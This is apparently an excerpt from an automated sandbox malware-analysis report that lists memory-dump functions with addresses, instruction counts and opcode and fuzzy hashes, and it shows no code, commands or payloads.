                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887afa000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 33ad3bac83e58aa548d8834af50f52370f1340c9579966d9e2426b3d087dfe53
                                    • Instruction ID: 6ad41632d495987616e7d1432a9644b9e7d2a2d75833f4287a8d65bf63eb9828
                                    • Opcode Fuzzy Hash: 33ad3bac83e58aa548d8834af50f52370f1340c9579966d9e2426b3d087dfe53
                                    • Instruction Fuzzy Hash: 0F01443199C6495FD752AB7488896ED7BF0FF0A354F0649F2E008CB0A2DA38A584D711
                                    Function 00007FF887AF28CD Relevance: .0, Instructions: 44COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a482e6dd602a2359401034d62e186a1ea2835a23405639d6366514c54ef2f036
                                    • Instruction ID: b82483864aecba0336ea8bcdf3828578ecd313d8e27bba35c7f5014872522324
                                    • Opcode Fuzzy Hash: a482e6dd602a2359401034d62e186a1ea2835a23405639d6366514c54ef2f036
                                    • Instruction Fuzzy Hash: 0D018B3098864D8FEB51EB74848A6FD7BF0FF19340F5148B6E408CB1A2EA38E584C742
                                    Function 00007FF887B07789 Relevance: .0, Instructions: 43COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7698a050685b50403032efa9cbde48c09b3de014ff840e4f235c5a491385a748
                                    • Instruction ID: 7aec3e0c931e5f377862b1f14f8437fb77dd87d59364b4017e75e0943556749d
                                    • Opcode Fuzzy Hash: 7698a050685b50403032efa9cbde48c09b3de014ff840e4f235c5a491385a748
                                    • Instruction Fuzzy Hash: 0E014F7094E2498FEB42EB7488596AD7BF1FF1A390F1949F6C408DB0A7DA38A444C712
                                    Function 00007FF887AF2F69 Relevance: .0, Instructions: 43COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ee1400a4bf294821f275d85d66c58927cfaabf6bc6c5ba1fb328868d77a05cf4
                                    • Instruction ID: aa03890b9c9a2e336bbb67780b19cb63522582f5f0f45d588c6f022f1b8910ff
                                    • Opcode Fuzzy Hash: ee1400a4bf294821f275d85d66c58927cfaabf6bc6c5ba1fb328868d77a05cf4
                                    • Instruction Fuzzy Hash: 6901843199D68A4FE751AB34885A1AD7BF0FF56350F0508F6D409CB0E6EE38A494C701
                                    Function 00007FF887AF0610 Relevance: .0, Instructions: 42COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b5731fa2ab9859aaf6a75f51b340200199f25e4b79c633f1c0612d8a6614d4ea
                                    • Instruction ID: 68e0fb04b552bfa217dd3eeff84de8efc5f50530f9c6f8d739955de94f52ed9a
                                    • Opcode Fuzzy Hash: b5731fa2ab9859aaf6a75f51b340200199f25e4b79c633f1c0612d8a6614d4ea
                                    • Instruction Fuzzy Hash: 5201693099890E9BEB58EB64D45A2BD72B0FF1834AF50087EE41EC61D1DF39A590CB41
                                    Function 00007FF887AF0608 Relevance: .0, Instructions: 42COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cf473f97ac5e8aeb6963413bd7f81f19a4949e89fe02f39262204ff552b73d36
                                    • Instruction ID: f43ba6dfa897d3596690ca83ee78bde01b3504ab972d08cd462f3a7e4bb1d132
                                    • Opcode Fuzzy Hash: cf473f97ac5e8aeb6963413bd7f81f19a4949e89fe02f39262204ff552b73d36
                                    • Instruction Fuzzy Hash: 69016930958A0E8FEB59EB64D44A2BE72B0FF18346F20087EE41EC61D5DF39A594C681
                                    Function 00007FF887AF1140 Relevance: .0, Instructions: 41COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dc475c73fae1ce2e12ff868a48f3282378eeb1eedfd512f09efb3d4cabc68787
                                    • Instruction ID: e1d71a84e429349959165ca7a9a1cbe456e3ea45d0871fd8cf83fa9d4298a5c0
                                    • Opcode Fuzzy Hash: dc475c73fae1ce2e12ff868a48f3282378eeb1eedfd512f09efb3d4cabc68787
                                    • Instruction Fuzzy Hash: F4F0DC30D58A1E8AEB98AA68D85A3BE77F0FF56364F00017ED419C20C0DF241014C601
                                    Function 00007FF887AFAE0A Relevance: .0, Instructions: 39COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AFA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887afa000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4caab1e22e373e3f393e303151023fa9c6c3ce37719e1a3418d1188e20c0bdec
                                    • Instruction ID: 319f854c8dd67bcc2df5b309d4ea98f83a41ce5ae2d9051167b7ce34efd31b05
                                    • Opcode Fuzzy Hash: 4caab1e22e373e3f393e303151023fa9c6c3ce37719e1a3418d1188e20c0bdec
                                    • Instruction Fuzzy Hash: 2A018C70D9861A8FE794EB68C48A2FE7AF1FF19380F1108B6D818C7191EE38A484C601
                                    Function 00007FF887AFC449 Relevance: .0, Instructions: 39COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AFA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887afa000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 803ecefae2cb93c6499adfe9399437d5e0d30f75fb7db063fd55841c45cc6b95
                                    • Instruction ID: 9e02495a144e8fa6baf84e725ed7304603832ef5a2cee12ac160d51bc4c9f9a8
                                    • Opcode Fuzzy Hash: 803ecefae2cb93c6499adfe9399437d5e0d30f75fb7db063fd55841c45cc6b95
                                    • Instruction Fuzzy Hash: 4901813084D78E8FDB56AF24885A2BD3FB1FF56351F5504BBD808C60D2DA399554C781
                                    Function 00007FF887AF05D0 Relevance: .0, Instructions: 39COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f49fc49f9072e7587d3951095f17dd3b0d04d9f1fe279729f016040fd1ff2975
                                    • Instruction ID: 676186f976255131fc2869c5e6109f7d60672895c68a0af7d7e71cb718e53cad
                                    • Opcode Fuzzy Hash: f49fc49f9072e7587d3951095f17dd3b0d04d9f1fe279729f016040fd1ff2975
                                    • Instruction Fuzzy Hash: 82F06D3085A64E8FEB58EE24D4166FE77B0FF15348F50087AE80DC2191DA39A5A0CB81
                                    Function 00007FF887AF1CFD Relevance: .0, Instructions: 39COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e9cfb72d0a37f13157d3cb057d73fdef6abdd55c91c13fe3955d6c71566bf36a
                                    • Instruction ID: 7a32f9a7e434fbc95fb78b5d4c2dc54c01f5321c415d06334517db49b9c00278
                                    • Opcode Fuzzy Hash: e9cfb72d0a37f13157d3cb057d73fdef6abdd55c91c13fe3955d6c71566bf36a
                                    • Instruction Fuzzy Hash: 90018C3094A68D8FDB58DF24C4566BD7BB0FF59344F5004BAE80CC6192DB79D994CB81
                                    Function 00007FF887AFC039 Relevance: .0, Instructions: 38COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AFA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887afa000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e09c116f2e53dea6e5c8de131cb9a15af241981650a9812d2eae5ef4ed70da64
                                    • Instruction ID: d1873b15dfb2b91cf7611611cba8917d1ccb98f1f72e5cb397a36e4b9f175004
                                    • Opcode Fuzzy Hash: e09c116f2e53dea6e5c8de131cb9a15af241981650a9812d2eae5ef4ed70da64
                                    • Instruction Fuzzy Hash: CC016D3088D68A8FEB959F6888192BD7FB0FF16241F4505BBE818C6192DA785558C701
                                    Function 00007FF887B10E04 Relevance: .0, Instructions: 36COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e35650b53b3341afde6c9f27ae06e3b6ae3d8e5fd9c159e96d2346af8504b13c
                                    • Instruction ID: 790c023f161591960bdb4080571ede0deccd2894111f9f3dacbd50f6ebfabd6d
                                    • Opcode Fuzzy Hash: e35650b53b3341afde6c9f27ae06e3b6ae3d8e5fd9c159e96d2346af8504b13c
                                    • Instruction Fuzzy Hash: AF016D71D18A5D9FDB98DF188855BA8BBB2FB59350F0445F9C00DD3282CE346984CF12
                                    Function 00007FF887B11192 Relevance: .0, Instructions: 36COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 33f86abd9d0e3fa21ad11ad91f0096b1957fd21793809aee500714812002aa16
                                    • Instruction ID: 3a936e00d4c7485208a91019e9f32f953a1cbc7c9af1885d449e5e30adf57b5f
                                    • Opcode Fuzzy Hash: 33f86abd9d0e3fa21ad11ad91f0096b1957fd21793809aee500714812002aa16
                                    • Instruction Fuzzy Hash: 88F096318CE2CA9FD712CB70C8155D97FB6BF43254F1900F6D445C70A2D96D151AC761
                                    Function 00007FF887B0BD52 Relevance: .0, Instructions: 36COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ae5a4b728f8ada186632a2daf38d95c88bc8cece29575a4611be8d3c0270c636
                                    • Instruction ID: 2c1bb2c28a78cb496fbe49a80361e1bb490941ca490261cdc56ae37ca69dd57a
                                    • Opcode Fuzzy Hash: ae5a4b728f8ada186632a2daf38d95c88bc8cece29575a4611be8d3c0270c636
                                    • Instruction Fuzzy Hash: 8CF0243188D3C59FC312CB708C114EA7FB0BF03214F1801FAE489CB0A2CA2C561AC762
                                    Function 00007FF887B02DB9 Relevance: .0, Instructions: 35COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8a77cab60efba5b1c69fa4569061460b63d50a6828f25583cf2ab0eb4881a19c
                                    • Instruction ID: f793ad09aecb5a3b08b281199b99b76b264c33ea0e43a981ab225bb57d2688cd
                                    • Opcode Fuzzy Hash: 8a77cab60efba5b1c69fa4569061460b63d50a6828f25583cf2ab0eb4881a19c
                                    • Instruction Fuzzy Hash: 4601D670D4822ADFEB14DF95C4456EDB7F2BF98341F10813AE409B2291EB386989DB50
                                    Function 00007FF887AFB795 Relevance: .0, Instructions: 33COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AFA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887afa000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d844de3948b997a4dcf80410e4a601aeb38c3c88e6edce7d8d44d15645a81fab
                                    • Instruction ID: 95db36d211841a6149c4300b5e69cbb310bf4edac7509e3567944ff193aeb731
                                    • Opcode Fuzzy Hash: d844de3948b997a4dcf80410e4a601aeb38c3c88e6edce7d8d44d15645a81fab
                                    • Instruction Fuzzy Hash: 3AF0C471D8991A9FEBE4EB288446BEAB3B1FF58340F1045B6C40DD6156EE34A981CF40
                                    Function 00007FF887AF27E9 Relevance: .0, Instructions: 33COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b7d6d69900b984faffe425d4f30c473d25b831656b67c36185986036e539c384
                                    • Instruction ID: 9fff2de5433f50139efff825b3ed7d962df972d38be006f3cffe358692284e6e
                                    • Opcode Fuzzy Hash: b7d6d69900b984faffe425d4f30c473d25b831656b67c36185986036e539c384
                                    • Instruction Fuzzy Hash: 69F06D3084D3898FDB5A9B2488552ED3B70FF56205F4508BAE419C61D2DB299898C782
                                    Function 00007FF887AFD472 Relevance: .0, Instructions: 32COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AFA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887afa000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 944cbd30fafb6e66461533288d51392142ee8dd5a92e3a794344e225cdf22d6b
                                    • Instruction ID: e559f080e62c6451931c080a8e802382db3aac30f278811e39329316f57add46
                                    • Opcode Fuzzy Hash: 944cbd30fafb6e66461533288d51392142ee8dd5a92e3a794344e225cdf22d6b
                                    • Instruction Fuzzy Hash: 2CF0173099C50A8FDB55EF54C492ABD77B5FF58352F204279D00AD2281CE386481CB80
                                    Function 00007FF887AFBD3F Relevance: .0, Instructions: 32COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AFA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887afa000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ed774e8c58129767f6edb86c50a4507a4eb39ed65b373a677adfae3ff76fbf7c
                                    • Instruction ID: 1cbcc199c92282ac686ca657d8f43a79863811c0bfa8845ff11edd1717301317
                                    • Opcode Fuzzy Hash: ed774e8c58129767f6edb86c50a4507a4eb39ed65b373a677adfae3ff76fbf7c
                                    • Instruction Fuzzy Hash: 28F0E230E4960ECFEB58DFA4C8956FDB3B5FF59384F10413AC41AA7291DA786940CB45
                                    Function 00007FF887AF285D Relevance: .0, Instructions: 31COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eab130d730f6caa97e99933f4a17f1aaa9450a0b11149971eac769b82466d2b3
                                    • Instruction ID: 1821b72cd1c4c208188dab298f40e528365ab1b18113e8635d8607aa58c93caa
                                    • Opcode Fuzzy Hash: eab130d730f6caa97e99933f4a17f1aaa9450a0b11149971eac769b82466d2b3
                                    • Instruction Fuzzy Hash: 2EF0BE309892498FEB599F2484562FD3BB0FF19305F4004BEE809C61D1DB399494C741
                                    Function 00007FF887B08059 Relevance: .0, Instructions: 29COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6ebf2e2be9bead861daedd8c17583cf798d5e9c33ac4bd70f4f6571a92b13f70
                                    • Instruction ID: d6afd7f0ea298317493b1c3a88f2f20bc32d3541c6c4e9c99f00b472c4fc04e7
                                    • Opcode Fuzzy Hash: 6ebf2e2be9bead861daedd8c17583cf798d5e9c33ac4bd70f4f6571a92b13f70
                                    • Instruction Fuzzy Hash: 69F05E72944A0E8FEB54DB44C894ABE7BF2FF54741F400539C409DB2A1DE386A41CB84
                                    Function 00007FF887B06AC0 Relevance: .0, Instructions: 28COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 47ccabcb10f85bc4bc95ae210d1dc1ee99a06b7e782aaa95a6be399f1b9b3f1e
                                    • Instruction ID: 27e0096dacbb7816ace20977b4b8a549f5677756b03072f1cf8a7e67041fef44
                                    • Opcode Fuzzy Hash: 47ccabcb10f85bc4bc95ae210d1dc1ee99a06b7e782aaa95a6be399f1b9b3f1e
                                    • Instruction Fuzzy Hash: 2EF0A470D0962D9FEBA8EF55D4957ECB7B2FF19345F1040AA9009A3291DF382A80DF01
                                    Function 00007FF887AFBDBE Relevance: .0, Instructions: 19COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AFA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887afa000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5cd823808fc3a7824d6e3fe9538c0192ac71a6fd8b217233cba645dd73f8f4b7
                                    • Instruction ID: 4bb3bb767fc5d05bc7efc48be9cc0ae7e9b9957cfa581308f9ed00c221626eb7
                                    • Opcode Fuzzy Hash: 5cd823808fc3a7824d6e3fe9538c0192ac71a6fd8b217233cba645dd73f8f4b7
                                    • Instruction Fuzzy Hash: 67D04831A5894D8F9F90EB98E491AEDBBB4FF59355F140026E51DE2245DA20A4918B40
                                    Function 00007FF887AFBD50 Relevance: .0, Instructions: 16COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AFA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887afa000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fb5354c602007d480db340a3eb2d6e6b50c6cae7999718fa83006b3bc9127330
                                    • Instruction ID: 8a0567391eda16aac44a9b8e49ae377f4486041ed3f634c7e9b859a96b6580e8
                                    • Opcode Fuzzy Hash: fb5354c602007d480db340a3eb2d6e6b50c6cae7999718fa83006b3bc9127330
                                    • Instruction Fuzzy Hash: A2D01774C0D64E8FDB08DF54C8456FD72B5FF1A380B10103AD40EA7291CB302900DB05
                                    Function 00007FF887B150B2 Relevance: .0, Instructions: 12COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b10f979ae7f94da207473a55da01e830bd6e8b924ab665f6927dca10e35e269e
                                    • Instruction ID: ab5879d6c23ff925364f901899817a4f8adcb849474af0093add59d6fa4bf3c7
                                    • Opcode Fuzzy Hash: b10f979ae7f94da207473a55da01e830bd6e8b924ab665f6927dca10e35e269e
                                    • Instruction Fuzzy Hash: C0C08C30B4E65A8FD2A29B74001127D22A3AF4D3807200CB6E04EC7282EC2D5A0183B1
                                    Function 00007FF887B0D8EB Relevance: .0, Instructions: 11COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7e4e2d27cc19b95ac49d679420b769d31a0b3f1c33d7fc346968aad416741ebb
                                    • Instruction ID: a022f9d7b5e2850cd26183cc57b09396c7cd5fd7f1b1317854f9941cb23217ba
                                    • Opcode Fuzzy Hash: 7e4e2d27cc19b95ac49d679420b769d31a0b3f1c33d7fc346968aad416741ebb
                                    • Instruction Fuzzy Hash: D1D0CA34A8DACB89F2384A0180A023E29B3BF003C0E60087EE1AF61AC1CD1DF901E212
                                    Function 00007FF887B1295B Relevance: .0, Instructions: 11COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0ead953dacc86d82a2f3683d79653d48c05253004b1f51817a113c88646d41ed
                                    • Instruction ID: fda469f7807fc6c72d5e6a5abf5a59289f64eb062ce7f91d98a51c79533ce87c
                                    • Opcode Fuzzy Hash: 0ead953dacc86d82a2f3683d79653d48c05253004b1f51817a113c88646d41ed
                                    • Instruction Fuzzy Hash: E3D0C930F8D54385F1388A9581202BE21B3BF487C0EA0443DD09FD19C5ED2CB481E621
                                    Function 00007FF887AF8C5C Relevance: .0, Instructions: 11COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 61ffc7c2bc8fb26abfdb1610ee2bf56bf2359935076313d532d345e9ed9eccc8
                                    • Instruction ID: 0090759c8152a4af25be1a04a8608f5cff4f032786f0a428fc6c6aaaa8590377
                                    • Opcode Fuzzy Hash: 61ffc7c2bc8fb26abfdb1610ee2bf56bf2359935076313d532d345e9ed9eccc8
                                    • Instruction Fuzzy Hash: 4CD06C7090492D8FDBA0EA188C45BEEB6B0BF48242F1001E5800DE2281DA70AAC08F40
                                    Function 00007FF887B11EA1 Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 92dcda61bac1f83781bb789a792d7796391cdc250812c3143bf8241cbba82c6c
                                    • Instruction ID: 3176a157dfb7978a27b3a8d43bc26f3fa9292dbd06d757c010355c197538ac86
                                    • Opcode Fuzzy Hash: 92dcda61bac1f83781bb789a792d7796391cdc250812c3143bf8241cbba82c6c
                                    • Instruction Fuzzy Hash: BFB00221F9C24757F52510E4045507C15732B852C5A944635951A951C2EC5D38409265
                                    Function 00007FF887B0C9F3 Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f137cdd1f83d6b22f4e54eed0239b6d93071933c80d1178526bc755bdd8209ac
                                    • Instruction ID: e8175a0dd89303ac2ee999f36081357f54c5363b6709ddd49008c706973c549d
                                    • Opcode Fuzzy Hash: f137cdd1f83d6b22f4e54eed0239b6d93071933c80d1178526bc755bdd8209ac
                                    • Instruction Fuzzy Hash: FFB00230F8D74357F57450B444951BC10B37B453C5A741A35D50B751D7EE9CBD50D291

                                    Non-executed Functions

                                    Function 00007FF887B01491 Relevance: 5.1, Strings: 4, Instructions: 91COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
